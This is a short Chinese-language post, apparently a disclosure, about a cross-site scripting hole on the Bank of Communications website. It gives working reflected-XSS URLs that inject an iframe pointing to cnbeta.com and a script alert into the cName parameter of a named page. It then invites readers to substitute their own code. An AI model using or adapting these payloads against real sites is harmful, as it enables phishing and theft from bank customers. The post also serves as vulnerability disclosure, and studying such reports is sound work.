新闻来源:原创
交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程"
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<iframe%20src=http://www.cnbeta.com></iframe>
为cnbeta增加点流量,
点击这里测试 提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<script>alert("吓小MM用的")</script>
吓小MM用的,
点击这里测试 其他的不演示了
把上面URL中“业务推荐”后的代码换成你的即可.